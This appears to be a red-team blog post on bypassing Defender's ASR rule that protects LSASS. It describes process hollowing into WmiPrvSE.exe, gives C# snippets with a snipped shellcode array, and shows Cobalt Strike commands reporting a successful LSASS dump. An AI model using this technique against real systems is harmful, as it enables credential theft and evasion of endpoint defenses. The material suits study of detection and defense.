Bypass ASR Rule and Dump LSASS

In this article, I'll share my successful method for bypassing the "Block credential stealing from the Windows local security authority subsystem (lsass.exe)" rule in Attack Surface Reduction (ASR), allowing me to dump the LSASS process. But before diving into the details, let me provide a brief introduction to ASR.

Introduction

Attack Surface Reduction (ASR) is a set of rules designed to limit the effectiveness of common malware techniques. ASR is a key feature of Defender's Advanced Threat Protection, which can help detect and prevent targeted exploits. By restricting the ways in which attackers can infiltrate a system, ASR provides an additional layer of defense against cyber threats.

Attack surface reduction (ASR) rules target certain software behaviors, such as:

Launching executable files and scripts that attempt to download or run files.
Running obfuscated or otherwise suspicious scripts.
Block credential stealing from the Windows local security authority subsystem (lsass.exe).

Attack surface reduction features across Windows versions. You can set attack surface reduction rules for devices that are running any of the following editions and versions of Windows:

Windows 10 Pro, version 1709 or later
Windows 10 Enterprise, version 1709 or later
Windows Server, version 1803 (Semi-Annual Channel) or later
Windows Server 2019
Windows Server 2016
Windows Server 2012 R2

ASR rule modes

Not configured or Disable: The state in which the ASR rule hasn't been enabled or has been disabled. The code for this state = 0.
Block: The state in which the ASR rule is enabled. The code for this state is 1.
Audit: The state in which the ASR rule is evaluated for the effect it would have on the organization or environment if enabled (set to block or warn). The code for this state is 2.
Warn The state in which the ASR rule is enabled and presents a notification to the end-user, but permits the end-user to bypass the block. The code for this state is 6.

Block credential stealing from LSASS

This rule helps prevent credential stealing by locking down Local Security Authority Subsystem Service (LSASS). For more information about others rules you can find it on Microsoft’s website.

Each rule has its own GUID. To enable this rule via Powershell by specifying the AttackSurfaceReductionRules_Actions as "Enable”:

Set-MpPreference -AttackSurfaceReductionRules_Ids 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 -AttackSurfaceReductionRules_Actions Enable

As shown in the picture, the rule is enabled in Block mode.

Trick Time

Microsoft says: “This rule prevents untrusted processes from having direct access to LSASS memory. Whenever a process tries to use the OpenProcess() function to access LSASS, with an access right of PROCESS_VM_READ, the rule will specifically block that access right.” You may be wondering if there is such a thing as a trusted process, and the answer is yes.

In fact, I went searching for some trusted processes or whitelisting options within Windows Defender, and I stumbled across the ExtractedDefender repository on GitHub. This repository contained a list of exclusion paths, which are considered to be trusted processes by Windows Defender.

If we can create a process as one of the processes in the list, we will be able to bypass the rule. So, say hello to Process Hollowing.

Process hollowing is commonly performed by creating a process in a suspended state then unmapping/hollowing its memory, which can then be replaced with malicious code.

By this technique, we can abuse the list of path exclusions from Windows defender, which gives us the advantage of dumping the LSASS process and bypassing the rule.

Let’s write our PoC. First, we need to create a process in a suspended state, and I will go with “WmiPrvSE.exe.”

// The sixth parameter (0x4) specifies the creation flags for the new process. The value 0x4 corresponds to the CREATE_SUSPENDED flag, which means that the new process will be created in a suspended state.
CreateProcess(null, "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", IntPtr.Zero, IntPtr.Zero, false, 0x4, IntPtr.Zero, null, ref si, out pi);

After the new process is created, we need to inject the shellcode in the created process (WmiPrvSE.exe).

byte[] buf = new byte[822] { 0xE9, 0x1B, 0x03, <snip> , 0xE6, 0x5E, 0xC3};
WriteProcessMemory(hProcess, addressOfEntryPoint, buf, buf.Length, out nRead);

Finally, resume the thread to trigger our payload to dump the LSASS process.

ResumeThread(pi.hThread);

Full C# code (PoC).

Like what you saw above, we successfully bypassed ASR by implementing the Process Hollowing technique.

However, it's important to note that there are other options available, and Cobalt Strike provides a convenient and efficient method for achieving similar results.


beacon> spawnto x64 C:\Windows\System32\wbem\WmiPrvSE.exe
[*] Tasked beacon to spawn x64 features to: C:\Windows\System32\wbem\WmiPrvSE.exe

beacon> execute-assembly MiniDump.exe
[*] LSASS dump succeeded